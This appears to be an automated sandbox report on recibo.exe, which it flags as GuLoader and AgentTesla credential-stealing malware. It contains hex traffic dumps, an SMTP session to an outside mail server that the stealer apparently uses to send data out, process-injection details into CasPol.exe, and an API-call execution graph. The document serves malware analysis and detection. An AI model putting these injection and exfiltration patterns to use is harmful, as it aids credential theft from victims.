                                                                                2022-05-27 11:26:33 UTC211INData Raw: 7c 4d ed 6c 76 3f ab 8f f4 2a 24 34 c3 8d 6f 67 de de 58 24 5f ef 30 f1 ce 68 b4 2c df 46 08 71 2c be e7 51 76 78 03 a2 e1 11 9c d4 3d 4b 19 82 d6 19 1e ea 70 f9 44 e4 50 53 b1 5a 83 c8 b1 fd b7 0a e1 81 7e 67 ff 1b 90 d4 2a 4d 9d d6 fe 7d 95 1f 90 a3 4d 4f 62 b1 45 52 27 6c 03 b2 02 69 df 68 08 05 20 7b 56 b0 ef d9 c7 06 1f 55 64 5c b6 e5 e1 e9 2a e0 0a be b1 a9 40 ca 53 c1 e9 5d 08 14 2c f2 d3 bc e2 09 94 2d c3 d9 14 27 08 54 ad 84 aa c3 da 83 37 e5 cd 1d 1f f2 fe fb 60 47 18 90 98 bd f1 43 3b d7 cc 96 fc a9 15 0e db 77 a4 6d 6d 89 fe 51 69 48 c1 fd 69 57 fa ac f3 dd 7c e7 31 2c 2d 00 9a bc fb fe af 3e 10 74 c4 e7 7a 18 3c 19 43 62 88 54 36 4e 35 29 f1 0f 9a ec df ca f9 43 22 6f ff 69 af fc 68 a4 4f 3b fb 4f 89 be 6d 00 a5 9a 38 b3 78 b5 e6 8b ec 7c ee
                                                                                Data Ascii: |Mlv?*$4ogX$_0h,Fq,Qvx=KpDPSZ~g*M}MObER'lih {VUd\*@S],-'T7`GC;wmmQiHiW|1,->tz<CbT6N5)C"oihO;Om8x|
                                                                                2022-05-27 11:26:33 UTC212INData Raw: cd e8 da 72 8d 89 ce 5e 00 23 c1 c5 60 c0 c2 68 4c 10 28 90 ec 35 c3 32 5a ec ce b4 7c 07 a4 49 47 23 52 21 82 25 53 be 81 b5 e3 e1 f0 86 6d 9b 24 30 d8 f8 1a bf 72 34 d0 4c f1 ba aa 3b 26 fb 4b 74 d2 20 12 f8 f7 a4 29 5b 56 cc 70 67 1f 16 55 db 70 a9 ae 03 95 43 b7 a2 a5 c8 d0 e5 63 d0 86 97 62 61 45 77 6b 93 7c a8 7d cf b8 09 d3 06 02 3d d6 51 b1 6b f1 80 e0 b0 ab a1 55 ab fe dc dd 7f 87 09 ee 36 be af a4 ff d9 39 1c 91 0b 79 98 ee e7 15 5b bd 0d 5b 42 64 cd 18 3f b9 6a ec 0b 8a 52 09 9d 39 f2 42 d0 bc e7 b9 87 ae ed 7d 39 80 41 3c d8 b5 86 70 1a 2c 6b 4b 1a ef f9 d2 ed c3 5f 76 67 c1 3b 42 74 68 ae e5 14 56 d8 e0 89 2e 52 60 1b b6 54 21 12 35 68 91 fa b4 b6 80 6d 03 1e 2e 87 5f 3e 2d 16 c4 31 c7 f3 a5 6e 64 f9 4a 80 49 3f 7c 25 8f dd ae e0 cc e7 77 7e
                                                                                Data Ascii: r^#`hL(52Z|IG#R!%Sm$0r4L;&Kt )[VpgUpCcbaEwk|}=QkU69y[[Bd?jR9B}9A<p,kK_vg;BthV.R`T!5hm._>-1ndJI?|%w~
                                                                                2022-05-27 11:26:33 UTC213INData Raw: 5c 51 05 3f 79 7d 20 4f 3f 37 6c c9 a7 06 7c 01 a5 c9 5b 04 2d aa ff 7b a6 7f b5 49 35 e9 86 d8 36 cc 25 02 67 c5 33 7a bd 4d 6c 07 5d 31 d1 9f 04 b4 6f 24 00 29 70 7c 1d 18 76 72 84 e4 a1 14 f8 48 7c 85 62 c4 b3 cb b7 d6 13 37 e3 21 c4 f8 77 6c d4 fc 94 b8 26 2f 0a 72 f4 87 0c 6b 14 9c 16 97 22 2b d3 8a 31 1d 72 17 77 7e 1e c9 c6 b9 9d 4c da cb 6c 2e 86 00 4f 0c ed 92 fe bd 83 ae 32 c8 63 f2 38 79 87 89 64 0e 22 91 38 7b 73 6f 28 98 3d c0 0b b8 33 c5 22 c6 b1 84 3d 06 02 d0 20 17 42 c0 4f 6d 4c 76 85 c2 c7 76 f0 4b 68 8a 2d 7c b5 4f bb bf 1a cc 49 5d a1 72 3f 9b e9 9a f5 35 66 2c 0d b1 6d ee 1f a0 51 07 06 49 1e fa b5 ba 1b 54 f9 71 52 d3 3b da ec 5a cf ee aa 98 2f 80 53 df 09 68 c1 0d c2 e1 8f 95 d8 d7 17 f9 9d 9a f9 30 ad ae 5b 98 b4 c9 32 ec e6 1b 22
                                                                                Data Ascii: \Q?y} O?7l|[-{I56%g3zMl]1o$)p|vrH|b7!wl&/rk"+1rw~Ll.O2c8yd"8{so(=3"= BOmLvvKh-|OI]r?5f,mQITqR;Z/Sh0[2"
                                                                                2022-05-27 11:26:33 UTC214INData Raw: 8e e6 ab 2c 21 d1 0d b2 66 cc 5f 50 36 df 46 22 71 67 66 a6 ac 76 5a 06 7f 3e 3f ef 59 6b 6a 83 0b e9 0c 8e 54 94 56 05 9f ca 04 1c ed 50 f8 59 f6 d0 fa bf 5c a3 c8 ac ef 37 a3 c4 86 71 72 ed 9b 4d d5 38 cc 95 c3 ec fd 48 1e 82 22 45 41 7f bf 4b 5c 29 62 11 33 0a 67 d1 7a 7d 18 23 73 4b be cb de ca 13 0d d5 b9 5d a4 64 e9 fc 38 60 d7 bf a3 28 48 c4 5d cf f5 53 06 06 ad 1b c1 3d ea 07 86 ac 2a cb 61 14 0f 43 b8 96 2a 1e db 91 b6 ed d8 0f 9f 2f ff e9 e1 4f 00 9e 8a 3d 50 4b 35 ca c9 84 7d a1 1d 1c 5b d6 b6 ec ed 87 e3 54 61 40 d3 88 61 4a f4 a4 fb d5 74 ec 31 2e 3f 82 93 ae 79 f7 bd bc 19 7a c3 e1 74 05 39 0b c1 9b 95 51 24 3b 28 2c d1 08 94 f9 cd 4a 24 42 2c 72 f1 74 a1 e9 7a 24 92 3a f5 41 81 b0 70 0e ad 87 36 bb 65 bb fb 85 e4 74 ee 59 a6 b6 57 ce b2 93
                                                                                Data Ascii: ,!f_P6F"qgfvZ>?YkjTVPY\7qrM8H"EAK\)b3gz}#sK]d8`(H]S=*aC*/O=PK5}[Ta@aJt1.?yzt9Q$;(,J$B,rtz$:Ap6etYW


                                                                                SMTP Packets

                                                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                                                May 27, 2022 13:26:44.919852972 CEST58749764168.119.38.32192.168.11.20220-isp.gesinfo.es ESMTP Exim 4.95 #2 Fri, 27 May 2022 13:26:44 +0200
                                                                                220-We do not authorize the use of this system to transport unsolicited,
                                                                                220 and/or bulk e-mail.
                                                                                May 27, 2022 13:26:44.920175076 CEST49764587192.168.11.20168.119.38.32EHLO 610930
                                                                                May 27, 2022 13:26:44.934568882 CEST58749764168.119.38.32192.168.11.20250-isp.gesinfo.es Hello 610930 [84.17.52.2]
                                                                                250-SIZE 52428800
                                                                                250-8BITMIME
                                                                                250-PIPELINING
                                                                                250-PIPE_CONNECT
                                                                                250-AUTH PLAIN LOGIN
                                                                                250-STARTTLS
                                                                                250 HELP
                                                                                May 27, 2022 13:26:44.934964895 CEST49764587192.168.11.20168.119.38.32STARTTLS
                                                                                May 27, 2022 13:26:44.950790882 CEST58749764168.119.38.32192.168.11.20220 TLS go ahead

                                                                                Statistics

                                                                                CPU Usage

                                                                                Click to jump to process

                                                                                Memory Usage

                                                                                Click to jump to process

                                                                                High Level Behavior Distribution

                                                                                Click to dive into process behavior distribution

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                General

                                                                                Target ID:1
                                                                                Start time:13:25:57
                                                                                Start date:27/05/2022
                                                                                Path:C:\Users\user\Desktop\recibo.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\recibo.exe"
                                                                                Imagebase:0x400000
                                                                                File size:606778 bytes
                                                                                MD5 hash:4680729EDCA682D1B6DE8CF875BBFDF5
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low

                                                                                General

                                                                                Target ID:3
                                                                                Start time:13:26:14
                                                                                Start date:27/05/2022
                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Users\user\Desktop\recibo.exe"
                                                                                Imagebase:0x470000
                                                                                File size:108664 bytes
                                                                                MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate

                                                                                General

                                                                                Target ID:4
                                                                                Start time:13:26:14
                                                                                Start date:27/05/2022
                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\recibo.exe"
                                                                                Imagebase:0x870000
                                                                                File size:108664 bytes
                                                                                MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000000.23175826600.0000000000D00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.28075201958.000000001D471000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.28075201958.000000001D471000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:moderate

                                                                                General

                                                                                Target ID:5
                                                                                Start time:13:26:14
                                                                                Start date:27/05/2022
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff736160000
                                                                                File size:875008 bytes
                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate

                                                                                Disassembly

                                                                                Reset < >

                                                                                  Execution Graph

                                                                                  Execution Coverage:3.7%
                                                                                  Dynamic/Decrypted Code Coverage:18.1%
                                                                                  Signature Coverage:24.5%
                                                                                  Total number of Nodes:1262
                                                                                  Total number of Limit Nodes:57
                                                                                  execution_graph 18999 401941 19000 401943 18999->19000 19005 402da6 19000->19005 19006 402db2 19005->19006 19050 40657a 19006->19050 19009 401948 19011 405c49 19009->19011 19092 405f14 19011->19092 19014 405c71 DeleteFileW 19016 401951 19014->19016 19015 405c88 19017 405da8 19015->19017 19106 40653d lstrcpynW 19015->19106 19017->19016 19135 406873 FindFirstFileW 19017->19135 19019 405cae 19020 405cc1 19019->19020 19021 405cb4 lstrcatW 19019->19021 19107 405e58 lstrlenW 19020->19107 19022 405cc7 19021->19022 19026 405cd7 lstrcatW 19022->19026 19028 405ce2 lstrlenW FindFirstFileW 19022->19028 19026->19028 19027 405dd1 19138 405e0c lstrlenW CharPrevW 19027->19138 19028->19017 19035 405d04 19028->19035 19031 405d8b FindNextFileW 19031->19035 19036 405da1 FindClose 19031->19036 19032 405c01 5 API calls 19034 405de3 19032->19034 19037 405de7 19034->19037 19038 405dfd 19034->19038 19035->19031 19046 405d4c 19035->19046 19111 40653d lstrcpynW 19035->19111 19036->19017 19037->19016 19041 40559f 24 API calls 19037->19041 19040 40559f 24 API calls 19038->19040 19040->19016 19043 405df4 19041->19043 19042 405c49 60 API calls 19042->19046 19045 4062fd 36 API calls 19043->19045 19044 40559f 24 API calls 19044->19031 19048 405dfb 19045->19048 19046->19031 19046->19042 19046->19044 19112 405c01 19046->19112 19120 40559f 19046->19120 19131 4062fd MoveFileExW 19046->19131 19048->19016 19052 406587 19050->19052 19051 4067aa 19053 402dd3 19051->19053 19083 40653d lstrcpynW 19051->19083 19052->19051 19055 406778 lstrlenW 19052->19055 19058 40657a 10 API calls 19052->19058 19059 40668f GetSystemDirectoryW 19052->19059 19061 4066a2 GetWindowsDirectoryW 19052->19061 19062 406719 lstrcatW 19052->19062 19063 40657a 10 API calls 19052->19063 19064 4067c4 5 API calls 19052->19064 19065 4066d1 SHGetSpecialFolderLocation 19052->19065 19076 40640b 19052->19076 19081 406484 wsprintfW 19052->19081 19082 40653d lstrcpynW 19052->19082 19053->19009 19067 4067c4 19053->19067 19055->19052 19058->19055 19059->19052 19061->19052 19062->19052 19063->19052 19064->19052 19065->19052 19066 4066e9 SHGetPathFromIDListW CoTaskMemFree 19065->19066 19066->19052 19074 4067d1 19067->19074 19068 406847 19069 40684c CharPrevW 19068->19069 19071 40686d 19068->19071 19069->19068 19070 40683a CharNextW 19070->19068 19070->19074 19071->19009 19073 406826 CharNextW 19073->19074 19074->19068 19074->19070 19074->19073 19075 406835 CharNextW 19074->19075 19088 405e39 19074->19088 19075->19070 19084 4063aa 19076->19084 19079 40646f 19079->19052 19080 40643f RegQueryValueExW RegCloseKey 19080->19079 19081->19052 19082->19052 19083->19053 19085 4063b9 19084->19085 19086 4063c2 RegOpenKeyExW 19085->19086 19087 4063bd 19085->19087 19086->19087 19087->19079 19087->19080 19089 405e3f 19088->19089 19090 405e55 19089->19090 19091 405e46 CharNextW 19089->19091 19090->19074 19091->19089 19141 40653d lstrcpynW 19092->19141 19094 405f25 19142 405eb7 CharNextW CharNextW 19094->19142 19097 405c69 19097->19014 19097->19015 19098 4067c4 5 API calls 19104 405f3b 19098->19104 19099 405f6c lstrlenW 19100 405f77 19099->19100 19099->19104 19102 405e0c 3 API calls 19100->19102 19101 406873 2 API calls 19101->19104 19103 405f7c GetFileAttributesW 19102->19103 19103->19097 19104->19097 19104->19099 19104->19101 19105 405e58 2 API calls 19104->19105 19105->19099 19106->19019 19108 405e66 19107->19108 19109 405e78 19108->19109 19110 405e6c CharPrevW 19108->19110 19109->19022 19110->19108 19110->19109 19111->19035 19148 406008 GetFileAttributesW 19112->19148 19115 405c2e 19115->19046 19116 405c24 DeleteFileW 19118 405c2a 19116->19118 19117 405c1c RemoveDirectoryW 19117->19118 19118->19115 19119 405c3a SetFileAttributesW 19118->19119 19119->19115 19121 4055ba 19120->19121 19130 40565c 19120->19130 19122 4055d6 lstrlenW 19121->19122 19123 40657a 17 API calls 19121->19123 19124 4055e4 lstrlenW 19122->19124 19125 4055ff 19122->19125 19123->19122 19126 4055f6 lstrcatW 19124->19126 19124->19130 19127 405612 19125->19127 19128 405605 SetWindowTextW 19125->19128 19126->19125 19129 405618 SendMessageW SendMessageW SendMessageW 19127->19129 19127->19130 19128->19127 19129->19130 19130->19046 19132 40631e 19131->19132 19133 406311 19131->19133 19132->19046 19151 406183 19133->19151 19136 405dcd 19135->19136 19137 406889 FindClose 19135->19137 19136->19016 19136->19027 19137->19136 19139 405dd7 19138->19139 19140 405e28 lstrcatW 19138->19140 19139->19032 19140->19139 19141->19094 19143 405ed4 19142->19143 19145 405ee6 19142->19145 19144 405ee1 CharNextW 19143->19144 19143->19145 19147 405f0a 19144->19147 19146 405e39 CharNextW 19145->19146 19145->19147 19146->19145 19147->19097 19147->19098 19149 405c0d 19148->19149 19150 40601a SetFileAttributesW 19148->19150 19149->19115 19149->19116 19149->19117 19150->19149 19152 4061b3 19151->19152 19153 4061d9 GetShortPathNameW 19151->19153 19178 40602d GetFileAttributesW CreateFileW 19152->19178 19155 4062f8 19153->19155 19156 4061ee 19153->19156 19155->19132 19156->19155 19158 4061f6 wsprintfA 19156->19158 19157 4061bd CloseHandle GetShortPathNameW 19157->19155 19159 4061d1 19157->19159 19160 40657a 17 API calls 19158->19160 19159->19153 19159->19155 19161 40621e 19160->19161 19179 40602d GetFileAttributesW CreateFileW 19161->19179 19163 40622b 19163->19155 19164 40623a GetFileSize GlobalAlloc 19163->19164 19165 4062f1 CloseHandle 19164->19165 19166 40625c 19164->19166 19165->19155 19180 4060b0 ReadFile 19166->19180 19171 40627b lstrcpyA 19174 40629d 19171->19174 19172 40628f 19173 405f92 4 API calls 19172->19173 19173->19174 19175 4062d4 SetFilePointer 19174->19175 19187 4060df WriteFile 19175->19187 19178->19157 19179->19163 19181 4060ce 19180->19181 19181->19165 19182 405f92 lstrlenA 19181->19182 19183 405fd3 lstrlenA 19182->19183 19184 405fdb 19183->19184 19185 405fac lstrcmpiA 19183->19185 19184->19171 19184->19172 19185->19184 19186 405fca CharNextA 19185->19186 19186->19183 19188 4060fd GlobalFree 19187->19188 19188->19165 21272 402b59 21273 402bab 21272->21273 21275 402b60 21272->21275 21274 40690a 5 API calls 21273->21274 21277 402bb2 21274->21277 21276 402ba9 21275->21276 21278 402d84 17 API calls 21275->21278 21279 402da6 17 API calls 21277->21279 21280 402b6e 21278->21280 21281 402bbb 21279->21281 21282 402d84 17 API calls 21280->21282 21281->21276 21283 402bbf IIDFromString 21281->21283 21285 402b7a 21282->21285 21283->21276 21284 402bce 21283->21284 21284->21276 21290 40653d lstrcpynW 21284->21290 21289 406484 wsprintfW 21285->21289 21288 402beb CoTaskMemFree 21288->21276 21289->21276 21290->21288 19602 40175c 19603 402da6 17 API calls 19602->19603 19604 401763 19603->19604 19608 40605c 19604->19608 19606 40176a 19607 40605c 2 API calls 19606->19607 19607->19606 19609 406069 GetTickCount GetTempFileNameW 19608->19609 19610 4060a3 19609->19610 19611 40609f 19609->19611 19610->19606 19611->19609 19611->19610 19696 405b63 ShellExecuteExW 20677 401563 20678 402ba4 20677->20678 20681 406484 wsprintfW 20678->20681 20680 402ba9 20681->20680 19725 2cc42e9 19726 2cc42fe 19725->19726 19739 2cc4547 19725->19739 19750 2cc34f4 19726->19750 19728 2cc34f4 19730 2cc35b9 19728->19730 19731 2cc3617 LoadLibraryA 19728->19731 19760 2cc3d6a 19730->19760 19746 2cc3654 19731->19746 19732 2cc44ca NtAllocateVirtualMemory 19732->19739 19735 2cc35c8 19737 2cc3654 3 API calls 19735->19737 19738 2cc3610 19737->19738 19738->19731 19739->19728 19740 2cb381c 19739->19740 19742 2cc4e81 19739->19742 19771 2cc37f4 19739->19771 19782 2cc4e88 19742->19782 19744 2cc4e83 19745 2cc4e88 4 API calls 19744->19745 19745->19744 19748 2cc36dd 19746->19748 19747 2cc37f4 3 API calls 19747->19748 19748->19747 19749 2cc3626 19748->19749 19751 2cc3554 19750->19751 19752 2cc35b9 19751->19752 19753 2cc3617 LoadLibraryA 19751->19753 19754 2cc3d6a 3 API calls 19752->19754 19755 2cc3654 3 API calls 19753->19755 19756 2cc35c8 19754->19756 19757 2cc3626 19755->19757 19758 2cc3654 3 API calls 19756->19758 19757->19728 19757->19732 19757->19740 19759 2cc3610 19758->19759 19759->19753 19761 2cc3d75 GetPEB 19760->19761 19766 2cb381c 19760->19766 19762 2cc34f4 19761->19762 19763 2cc3617 LoadLibraryA 19762->19763 19764 2cc3d6a LoadLibraryA 19762->19764 19762->19766 19765 2cc3654 LoadLibraryA 19763->19765 19767 2cc35c8 19764->19767 19768 2cc3626 19765->19768 19766->19735 19769 2cc3654 LoadLibraryA 19767->19769 19768->19735 19770 2cc3610 19769->19770 19770->19763 19772 2cc34f4 19771->19772 19780 2cc3808 19771->19780 19773 2cc35b9 19772->19773 19774 2cc3617 LoadLibraryA 19772->19774 19775 2cc3d6a 2 API calls 19773->19775 19776 2cc3654 2 API calls 19774->19776 19777 2cc35c8 19775->19777 19778 2cc3626 19776->19778 19779 2cc3654 2 API calls 19777->19779 19778->19739 19781 2cc3610 19779->19781 19780->19739 19781->19774 19784 2cc34f4 19782->19784 19783 2cbcda1 19783->19744 19784->19783 19785 2cc3617 LoadLibraryA 19784->19785 19786 2cc3d6a 3 API calls 19784->19786 19787 2cc3654 3 API calls 19785->19787 19789 2cc35c8 19786->19789 19788 2cc3626 19787->19788 19788->19744 19790 2cc3654 3 API calls 19789->19790 19791 2cc3610 19790->19791 19791->19785 19823 2cc67e9 19824 2cc6833 19823->19824 19825 2cc6a45 NtMapViewOfSection 19824->19825 19826 2cc6a85 19825->19826 20682 401968 20683 402d84 17 API calls 20682->20683 20684 40196f 20683->20684 20685 402d84 17 API calls 20684->20685 20686 40197c 20685->20686 20687 402da6 17 API calls 20686->20687 20688 401993 lstrlenW 20687->20688 20689 4019a4 20688->20689 20692 4019e5 20689->20692 20694 40653d lstrcpynW 20689->20694 20691 4019d5 20691->20692 20693 4019da lstrlenW 20691->20693 20693->20692 20694->20691 19839 2cb3ee0 19840 2cb3c1d 19839->19840 19840->19839 19841 2cb3ef3 19840->19841 19842 2cb3bae 19840->19842 19847 2cb3f9e 19841->19847 19844 2cc34f4 4 API calls 19842->19844 19846 2cb3bcc 19844->19846 19849 2cb3fd9 19847->19849 19848 2cc34f4 4 API calls 19850 2cb404e 19848->19850 19849->19848 19851 71542a7f 19852 71542acf 19851->19852 19853 71542a8f VirtualProtect 19851->19853 19853->19852 20112 2cb36e4 20113 2cb36cb 20112->20113 20113->20112 20114 2cb3756 20113->20114 20115 2cb374b EnumWindows 20113->20115 20115->20114 20116 40176f 20117 402da6 17 API calls 20116->20117 20118 401776 20117->20118 20119 401796 20118->20119 20120 40179e 20118->20120 20155 40653d lstrcpynW 20119->20155 20156 40653d lstrcpynW 20120->20156 20123 4017a9 20125 405e0c 3 API calls 20123->20125 20124 40179c 20127 4067c4 5 API calls 20124->20127 20126 4017af lstrcatW 20125->20126 20126->20124 20142 4017bb 20127->20142 20128 406873 2 API calls 20128->20142 20129 406008 2 API calls 20129->20142 20131 4017cd CompareFileTime 20131->20142 20132 40188d 20134 40559f 24 API calls 20132->20134 20133 401864 20135 40559f 24 API calls 20133->20135 20152 401879 20133->20152 20136 401897 20134->20136 20135->20152 20137 4032b4 31 API calls 20136->20137 20138 4018aa 20137->20138 20139 4018be SetFileTime 20138->20139 20141 4018d0 CloseHandle 20138->20141 20139->20141 20140 40657a 17 API calls 20140->20142 20143 4018e1 20141->20143 20141->20152 20142->20128 20142->20129 20142->20131 20142->20132 20142->20133 20142->20140 20144 40653d lstrcpynW 20142->20144 20151 405b9d MessageBoxIndirectW 20142->20151 20154 40602d GetFileAttributesW CreateFileW 20142->20154 20145 4018e6 20143->20145 20146 4018f9 20143->20146 20144->20142 20148 40657a 17 API calls 20145->20148 20147 40657a 17 API calls 20146->20147 20150 401901 20147->20150 20149 4018ee lstrcatW 20148->20149 20149->20150 20150->20152 20153 405b9d MessageBoxIndirectW 20150->20153 20151->20142 20153->20152 20154->20142 20155->20124 20156->20123 20295 2cb7af1 20296 2cb7ada 20295->20296 20300 2cb7b01 20295->20300 20339 2cb7ae6 20296->20339 20297 2cb7b60 20307 2cb381c 20297->20307 20329 2cc2ff0 20297->20329 20300->20297 20308 2cc42e9 20300->20308 20301 2cc268b 20303 2cc34f4 4 API calls 20301->20303 20304 2cc27c9 20303->20304 20345 2cc2877 20304->20345 20306 2cc2d7c 20309 2cc42fe 20308->20309 20322 2cc4547 20308->20322 20310 2cc34f4 4 API calls 20309->20310 20312 2cc43b2 20310->20312 20311 2cc34f4 20313 2cc35b9 20311->20313 20314 2cc3617 LoadLibraryA 20311->20314 20312->20311 20315 2cc44ca NtAllocateVirtualMemory 20312->20315 20323 2cb381c 20312->20323 20316 2cc3d6a 3 API calls 20313->20316 20317 2cc3654 3 API calls 20314->20317 20315->20322 20318 2cc35c8 20316->20318 20319 2cc3626 20317->20319 20320 2cc3654 3 API calls 20318->20320 20319->20297 20321 2cc3610 20320->20321 20321->20314 20322->20311 20322->20323 20324 2cc37f4 3 API calls 20322->20324 20325 2cc4e81 20322->20325 20323->20297 20324->20322 20326 2cc4e88 4 API calls 20325->20326 20327 2cc4e83 20326->20327 20328 2cc4e88 4 API calls 20327->20328 20328->20327 20330 2cc3003 20329->20330 20330->20307 20331 2cc3617 LoadLibraryA 20330->20331 20332 2cc3d6a 3 API calls 20330->20332 20338 2cb381c 20330->20338 20333 2cc3654 3 API calls 20331->20333 20334 2cc35c8 20332->20334 20335 2cc3626 20333->20335 20336 2cc3654 3 API calls 20334->20336 20335->20307 20337 2cc3610 20336->20337 20337->20331 20338->20307 20340 2cb7af9 20339->20340 20341 2cc42e9 7 API calls 20340->20341 20342 2cb7b60 20341->20342 20343 2cc2ff0 4 API calls 20342->20343 20344 2cb381c 20342->20344 20343->20344 20344->20301 20346 2cc28bd 20345->20346 20347 2cc42e9 7 API calls 20346->20347 20348 2cc2a04 20347->20348 20356 2cc2b9d 20348->20356 20350 2cc2d27 20350->20306 20352 2cc4e88 4 API calls 20350->20352 20351 2cc2a3c 20351->20350 20359 2cc2ac6 20351->20359 20354 2cc4e83 20352->20354 20355 2cc4e88 4 API calls 20354->20355 20355->20354 20357 2cc2c09 CreateFileA 20356->20357 20357->20351 20360 2cc42e9 7 API calls 20359->20360 20361 2cc2aec 20360->20361 20362 2cc2b9d CreateFileA 20361->20362 20363 2cc2b58 20362->20363 20364 2cc2b9a 20363->20364 20365 2cc4e88 4 API calls 20363->20365 20364->20350 20366 2cc4e83 20365->20366 20367 2cc4e88 4 API calls 20366->20367 20367->20366 20198 40167b 20199 402da6 17 API calls 20198->20199 20200 401682 20199->20200 20201 402da6 17 API calls 20200->20201 20202 40168b 20201->20202 20203 402da6 17 API calls 20202->20203 20204 401694 MoveFileW 20203->20204 20205 4016a0 20204->20205 20206 4016a7 20204->20206 20208 401423 24 API calls 20205->20208 20207 406873 2 API calls 20206->20207 20210 4022f6 20206->20210 20209 4016b6 20207->20209 20208->20210 20209->20210 20211 4062fd 36 API calls 20209->20211 20211->20205 20212 2cb48f5 20214 2cb4914 20212->20214 20213 2cc37f4 3 API calls 20213->20214 20214->20213 20215 2cb4a0e 20214->20215 20216 2cc4e81 20215->20216 20220 2cb4a35 20215->20220 20217 2cc4e88 4 API calls 20216->20217 20218 2cc4e83 20217->20218 20219 2cc4e88 4 API calls 20218->20219 20219->20218 21311 2cb3588 21312 2cb3595 21311->21312 21314 2cb3650 21312->21314 21317 2cc5269 21312->21317 21315 2cc34f4 4 API calls 21314->21315 21316 2cb366b 21315->21316 21318 2cc34f4 4 API calls 21317->21318 21319 2cc527a 21318->21319 21320 2cc34f4 4 API calls 21319->21320 21321 2cc5292 21320->21321 21322 2cc52a0 GetPEB 21321->21322 21323 2cc52ea 21322->21323 21324 2cc34f4 21323->21324 21327 2cc53be 21323->21327 21325 2cc35b9 21324->21325 21326 2cc3617 LoadLibraryA 21324->21326 21328 2cc3d6a 3 API calls 21325->21328 21330 2cc3654 3 API calls 21326->21330 21329 2cc61b4 NtProtectVirtualMemory 21327->21329 21331 2cc35c8 21328->21331 21336 2cc53c4 21329->21336 21332 2cc3626 21330->21332 21333 2cc3654 3 API calls 21331->21333 21332->21312 21334 2cc3610 21333->21334 21334->21326 21335 2cc5b8d 21339 2cc5f27 21335->21339 21343 2cc5c56 21335->21343 21336->21335 21340 2cc56fa 21336->21340 21342 2cb381c 21336->21342 21337 2cc61b4 NtProtectVirtualMemory 21338 2cc61ab 21337->21338 21338->21312 21339->21337 21339->21342 21341 2cc61b4 NtProtectVirtualMemory 21340->21341 21340->21342 21341->21342 21342->21312 21343->21342 21344 2cc61b4 NtProtectVirtualMemory 21343->21344 21345 2cc5f11 21344->21345 21345->21312 20714 40190c 20715 401943 20714->20715 20716 402da6 17 API calls 20715->20716 20717 401948 20716->20717 20718 405c49 67 API calls 20717->20718 20719 401951 20718->20719 19296 2cc2b9d 19297 2cc2c09 CreateFileA 19296->19297 20732 405513 20733 405523 20732->20733 20734 405537 20732->20734 20735 405529 20733->20735 20744 405580 20733->20744 20736 40553f IsWindowVisible 20734->20736 20740 405556 20734->20740 20738 4044e5 SendMessageW 20735->20738 20739 40554c 20736->20739 20736->20744 20737 405585 CallWindowProcW 20741 405533 20737->20741 20738->20741 20745 404e54 SendMessageW 20739->20745 20740->20737 20750 404ed4 20740->20750 20744->20737 20746 404eb3 SendMessageW 20745->20746 20747 404e77 GetMessagePos ScreenToClient SendMessageW 20745->20747 20749 404eab 20746->20749 20748 404eb0 20747->20748 20747->20749 20748->20746 20749->20740 20759 40653d lstrcpynW 20750->20759 20752 404ee7 20760 406484 wsprintfW 20752->20760 20754 404ef1 20755 40140b 2 API calls 20754->20755 20756 404efa 20755->20756 20761 40653d lstrcpynW 20756->20761 20758 404f01 20758->20744 20759->20752 20760->20754 20761->20758 21098 40261c 21099 402da6 17 API calls 21098->21099 21100 402623 21099->21100 21103 40602d GetFileAttributesW CreateFileW 21100->21103 21102 40262f 21103->21102 19827 40252a 19828 402de6 17 API calls 19827->19828 19829 402534 19828->19829 19830 402da6 17 API calls 19829->19830 19831 40253d 19830->19831 19832 402548 RegQueryValueExW 19831->19832 19835 40292e 19831->19835 19833 402568 19832->19833 19834 40256e RegCloseKey 19832->19834 19833->19834 19838 406484 wsprintfW 19833->19838 19834->19835 19838->19834 19878 40352d SetErrorMode GetVersionExW 19879 4035b7 19878->19879 19880 40357f GetVersionExW 19878->19880 19881 403610 19879->19881 19882 40690a 5 API calls 19879->19882 19880->19879 19883 40689a 3 API calls 19881->19883 19882->19881 19884 403626 lstrlenA 19883->19884 19884->19881 19885 403636 19884->19885 19886 40690a 5 API calls 19885->19886 19887 40363d 19886->19887 19888 40690a 5 API calls 19887->19888 19889 403644 19888->19889 19890 40690a 5 API calls 19889->19890 19891 403650 #17 OleInitialize SHGetFileInfoW 19890->19891 19969 40653d lstrcpynW 19891->19969 19894 40369d GetCommandLineW 19970 40653d lstrcpynW 19894->19970 19896 4036af 19897 405e39 CharNextW 19896->19897 19898 4036d5 CharNextW 19897->19898 